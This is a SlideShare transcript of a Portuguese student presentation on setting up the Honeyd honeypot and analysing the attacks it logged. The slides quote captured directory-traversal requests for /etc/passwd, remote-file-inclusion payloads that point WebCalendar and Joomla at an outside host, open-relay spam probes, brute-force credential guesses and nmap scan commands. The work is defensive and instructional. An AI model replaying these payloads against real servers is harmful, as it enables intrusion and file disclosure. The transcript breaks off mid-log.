Your SlideShare is downloading. ×
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Uso de Honeypots com Honeyd
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Uso de Honeypots com Honeyd

1,028

Published on

Trabalho sobre a implementação de Honeypots recorrendo ao Honeyd

Trabalho sobre a implementação de Honeypots recorrendo ao Honeyd

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,028
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
46
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Uso de HoneyPots com o Honeyd Pedro Pereira Ulisses Costa Criptografia e Seguran¸a de Sistemas de Informa¸˜o c ca 18 de Dezembro de 2008 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 2. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 3. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 4. O que s˜o HoneyPot’s? a Programas que emulam vulnerabilidades conhecidas Armadilhas para detectar ou impedir ataques Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 5. Tipos de HoneyPot’s Personalidade Alta interac¸˜o (high-interaction) ca Baixa interac¸˜o (low-interaction) ca Modus operandi Servidor Cliente Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 6. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 7. Honeyd Cria¸˜o de hosts virtuais ca Configura¸˜o dos hosts ca Suporte para mais de 1000 personalidades Muitas dezenas de scripts para emula¸˜o de servi¸os ca c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 8. Configura¸˜o do Honeyd ca bash > farpd 192.168.1.50 -i eth0 # File : / etc / defaults / honeyd # Defaults for honeyd initscript # Correr como deamon RUN =quot; yes quot; # Interface de rede onde o honeyd vai escutar pedidos INTERFACE =quot; eth0 quot; # Rede que o honeyd simula NETWORK =192.168.1.50 # Conjunto de opcoes # -c hostname : port : username : password OPTIONS =quot; - c localhost :12345: username : password quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 9. O comando -c hostname:port:username:password Gera¸˜o de estat´ ca ısticas parciais do Honeyd bash > honeydstats -- os_report / etc / honeypot / os -- port_report / etc / honeypot / port -- spammer_report / etc / honeypot / spam -- country_report / etc / honeypot / country -f / etc / honeypot / honeydstats . conf -l localhost -p 12345 # File : / etc / honeypot / honeydstats . conf # Ficheiro de configuracao do honeydstats username : password Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 10. Configura¸˜o do HoneyPot(1/2) ca # File : / etc / honeypot / honeyd . conf # Configuracao do honeypot create win2k set win2k personality quot; Microsoft Windows 2000 SP2 quot; set win2k default tcp action reset set win2k default udp action reset set win2k default icmp action block set win2k uptime 3567 add win2k tcp port 21 quot; sh / usr / share / honeyd / scripts / win32 / win2k / msftp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 23 quot; perl / usr / share / honeyd / scripts / unix / linux / suse7 .0/ telnetd . sh quot; add win2k tcp port 25 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - smtp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 80 quot; sh / usr / share / honeyd / scripts / win32 / win2k / iis . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 110 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - pop3 . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 143 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - imap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 389 quot; sh / usr / share / honeyd / scripts / win32 / win2k / ldap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 5901 quot; sh / usr / share / honeyd / scripts / win32 / win2k / vnc . sh $ipsrc $sport $ipdst $dport quot; add win2k udp port 161 quot; perl / usr / share / honeyd / scripts / unix / general / snmp / fake - snmp . pl public private -- config = scripts / unix / general quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 11. Configura¸˜o do HoneyPot(2/2) ca add win2k udp port 137 proxy $ipsrc :137 add win2k udp port 138 proxy $ipsrc :138 add win2k udp port 445 proxy $ipsrc :445 add win2k tcp port 137 proxy $ipsrc :137 add win2k tcp port 138 proxy $ipsrc :138 add win2k tcp port 139 proxy $ipsrc :139 add win2k tcp port 445 proxy $ipsrc :445 bind 192.168.1.50 win2k$ Imposs´ monitorizar portos NETBIOS ıvel Grade complexidade Decis˜o reencaminhar para source a Inicializar o nosso HoneyPot: bash > / etc / init . d / honeyd start Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 12. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 13. Ficheiros /var/log/honeyd.txt SMTP, Telnet, IMAP, POP3 /var/log/honeypot/web.log HTTP /var/log/honeypot/honeyd.log Log principal do Honeyd Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 14. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 15. Formato do ficheiro /var/log/honeypot/honeyd.log Data Protocolo T IPOrig PortOrig IPDst PortDst Info Comment´rio a ... tcp(6) S 88.44.123.210 3637 ... 139 [Windows XP SP1] ... tcp(6) S 82.155.0.49 22617 ... 139 ... tcp(6) E 82.155.1.160 4399 ... 445: 00 ... tcp(6) - 82.155.122.18 61582 ... 139: 40 R ... icmp(1) - 80.236.5.27 ...: 3(13): 56 ... tcp(6) - 82.154.64.174 34507 ... 445: 40 RA ... tcp(6) - 124.8.74.33 1806 ... 25: 70 FPA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA ... tcp(6) - 82.155.57.245 58274 ... 445: 52 PA [Windows XP SP1] ... tcp(6) - 193.136.19.149 58274 ... 445: 52 PA ... tcp(6) - 88.175.73.149 4332 ... 139: 40 R [Windows XP SP1] ... tcp(6) - 82.155.137.139 1230 ... 445: 40 A [Windows XP SP1] ... tcp(6) - 82.155.7.176 2794 ... 445: 40 A ... tcp(6) - 82.155.116.238 3578 ... 23: 60 S [Linux 2.6 .1-7] ... tcp(6) - 124.207.41.198 48804 ... 23: 40 S ... udp(17) - 192.168.1.254 67 ... 68: 298 Data no formato: 2008-12-15-22:59:03.4039 IPDst ´ sempre o mesmo (neste caso) - 192.168.1.50 e Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 16. Formato do ficheiro /var/log/honeypot/honeyd.log 2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.50 80 2009 -01 -01 -05:58:40.3750 tcp (6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008 Para TCP e UDP n˜o s˜o gravadas todas as transmiss˜es de aa o pacotes Seria demasiando verboso Apenas a quantidade transmitida Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 17. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 18. SMTP Usado do lado do servidor para enviar mensagens Para receber usams POP3 ou IMAP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 19. SMTP - HoneyPot Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 20. Comando EHLO em SMTP Comando para identificar clientes Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 21. Comando EHLO em SMTP S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009 C : EHLO windows S : 250 - bps - pc9 . local . mynet Hello [12] S : 250 - TURN S : 250 - ATRN S : 250 - SIZE S : 250 - ETRN S : 250 - PIPELINING S : 250 - DSN S : 250 - E N H A N C E D S T A TU S C O D E S S : 250 -8 bitmime S : 250 - BINARYMIME S : 250 - CHUNKING S : 250 - VRFY S : 250 - X - EXPS GSSAPI NTLM LOGIN S : 250 - X - EXPS = LOGIN S : 250 - AUTH GSSAPI NTLM LOGIN S : 250 - AUTH = LOGIN S : 250 - X - LINK2STATE S : 250 - XEXCH50 } S : 250 OK Identifica¸˜o por nomes de dominios n˜o reais ca a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 22. Spamm em servidores SMTP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 23. Solu¸oes c˜ EHLO [host] verificar se resolvem Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 24. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 25. Ataques HELO 8 2.155.248.223 MAIL FROM : < jk9l3g4jle@yahoo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.248.223 2008 -12 -11 -09:45:27.9566 tcp (6) S 124.11.193.219 2774 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -11 -09:46:33.6989 tcp (6) E 124.11.193.219 2774 192.168.1.50 25: 178 920 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 26. Ataques HELO 82.155.251.32 MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.251.32 2008 -12 -23 -12:18:11.3939 tcp (6) S 114.44.42.34 2748 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:11.3953 tcp (6) S 114.44.42.34 2750 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:12.1966 tcp (6) E 114.44.42.34 2750 192.168.1.50 25: 0 116 2008 -12 -23 -12:18:13.1996 tcp (6) E 114.44.42.34 2748 192.168.1.50 25: 0 232 2008 -12 -23 -12:21:55.1773 tcp (6) S 114.44.42.34 3347 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:21:57.1324 tcp (6) E 114.44.42.34 3347 192.168.1.50 25: 0 232 2008 -12 -23 -14:06:30.5003 tcp (6) S 114.44.42.34 1634 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:30.5023 tcp (6) S 114.44.42.34 1635 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:43.0390 tcp (6) E 114.44.42.34 1635 192.168.1.50 25: 177 335 2008 -12 -23 -14:06:51.4612 tcp (6) E 114.44.42.34 1634 192.168.1.50 25: 177 418 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 27. Ataques HELO 8 2.155.103.147 MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw > RCPT TO : < vjd39hww@yahoo . com . tw > DATA Received : from ( [ 1 4 5 . 2 0 0. 2 0 1 . 1 1 4 ] ) by 82 .155.103.147 id <9624303 -98482 >; Tue , 06 Jan 2009 21:16:04 -0100 Message - ID : < w58 $6a4j1fqc6q@ocjc8ujvz > From : quot;quot; < t t c5 85 t tc 5 85 @y a ho o . com . tw > To : < vjd39hww@yahoo . com . tw > Subject : BC_82 .155.103.147 Date : Tue , 06 Jan 09 21:16:04 GMT MIME - Version : 1.0 Content - Type : multipart / alternative ; boundary =quot; - - - -= _ N e x t P a r t _ 0 0 0 _ 0 0 0 D _ 0 1 C 2 C C 6 0 .49 F4EC70 quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 28. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 29. HTTP hit’s Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 30. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 31. User agent: webcollage/1.135a -- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;92.240.68.152quot; ,quot;192.168.1.50quot; ,56886 ,80 , quot; GET http :// www . morgangirl . com / pics / land / land1 . jpg HTTP /1.0 User - Agent : webcollage /1.135 a Referer : http :// random . yahoo . com / fast / ryl Host : www . morgangirl . com quot;, -- ENDMARK - - Tentativa de obter uma imagem atrav´s do HoneyPot e HoneyPotpode ter sido “visto” por um proxy scanner HoneyPot como um proxy aberto Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 32. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 33. Directory traversal Tamb´m conhecido como dot dot slash attack (../) e Explora a insuficiˆncia de valida¸˜o de pedidos e ca Ficheiros do sistema GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:57 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59706 ,80 , quot; GET %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 34. Directory traversal GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:58 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59711 ,80 , quot; GET %2 E %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 35. Directory traversal GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:02 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59727 ,80 , quot; GET %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 Fetc %5 C %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 36. Directory traversal GET . . . . . . . . . . . . . . . . . . . . etc passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:04 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59740 ,80 , quot; GET %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 Cetc %5 Cpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 37. Directory traversal GET // etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59700 ,80 , quot; GET %2 F %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 38. Conclus˜o a No HoneyPot n˜o foi bem sucedido a Sistema de baixa interactividade No nosso HoneyPot erro 302 Object moved Utiliza¸˜o de NMap scripting engine ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 39. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 40. Morfeus Scanner Procura vulnerabilidades PHP Vulnerabilidades conhecidas Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 41. Morfeus Scanner - WebCalendar Cria¸˜o de calend´rios online ca a Vulnerabilidade no ficheiro send reminder.php -- MARK - - ,quot; Wed Dec 24 16:07:29 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,54941 ,80 , quot; GET / webcalendar / tools / send_reminders . php ? noSet =0& includedir = http : / / 2 17 .2 0 .1 7 2. 12 9 / twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 42. Morfeus Scanner - Mambo Joomla CMS’s muito conhecido O atacante pretende definir a vari´vel a mosConfig absolute path do ficheiro index.php -- MARK - - ,quot; Wed Dec 24 16:07:34 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,55438 ,80 , quot; GET / shop / index . php ? option = com_registration & task = register // boutique / index2 . php ? _REQUEST =& _REQUEST %5 boption %5 d = com_content & _REQUEST %5 bItemid %5 d =1& GLOBALS =& m o s C o n f i g _ a b s o l u t e _ p a t h = http :/ / 21 7 .2 0. 1 72 . 12 9/ twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 43. Prevenir ataques do Morfeus Scanner Uma maneira de bloquear este tipo de ataques vindos do MFS ´ e adicionar as seguintes linhas de c´digo no ficheiro “.htaccess” na o pasta do website. # Start of . htaccess change . RewriteEngine On RewriteCond %{ HTTP_USER_AGENT } ^ Morfeus RewriteRule ^.* $ - [ F ] # End of . htaccess change . Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 44. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 45. Tentativa de brute force no servidor POP3 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 46. Tentativa de brute force no servidor POP3 ... -- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54678 ,110 , quot; USER root PASS root quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:49 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54729 ,110 , quot; USER root PASS root1 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:50 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54731 ,110 , quot; USER staff PASS staff quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:52 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER root PASS 12345 quot;, -- ENDMARK - - -- MARK - - ,quot; Mon Dec 22 11:34:53 WET 2008quot; ,quot; exchange / POP3 quot; ,quot;91.189.83.181quot; ,quot;192.168.1.50quot; ,54774 ,110 , quot; USER www PASS www quot;, -- ENDMARK - - ... Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 47. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 48. SSH Aqui est´ um gr´fico que mostra as tentativas de usernames: a a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 49. SSH E o seguinte gr´fico mostra as tentativas de passwords: a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 50. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 51. A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 52. Port scanning Descobrir m´quinas e respectivos portos a Cria¸˜o de pacotes personalizados ca Dificil de dominar NMap - insecure.org Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 53. Port scanning Open ou Accepted: A m´quina enviou uma resposta a indicar a que um servi¸o est´ a escutar aquele porto; c a Closed, Denied ou Not Listening : A m´quina enviou uma a resposta a indicar que qualquer conex˜o no porto ser´ negada; a a Filtered, Dropped ou Blocked: N˜o houve resposta por parte a da m´quina. a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 54. Port scanning Tipos de t´cnicas e TCP/SYN TCP Connect UDP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 55. TCP Connect Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 56. Port scanning Optimiza¸˜o ca golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24 ... Nmap finished : 256 IP addresses (29 hosts up ) scanned in 2033.375 seconds golden@golden - laptop :~ $ sudo nmap - sS - sV - P0 192.168.100.0/24 ... Nmap finished : 256 IP addresses (32 hosts up ) scanned in 2038.191 seconds Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 57. Ataque For¸a bruta / Dicion´rios c a Explora¸˜o de vulnerabilidades ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 58. SSH Porto 22 Atacado em For¸a bruta / Dicion´rios c a cat /var/log/auth.log Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 59. SSH - log Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from 89.235.152.18 Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:24:46 golden - laptop sshd [23906]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:24:48 golden - laptop sshd [23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2 Dec 24 01:24:49 golden - laptop sshd [23908]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:01 golden - laptop sshd [23963]: Invalid user test from 89.235.152.18 Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:01 golden - laptop sshd [23963]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 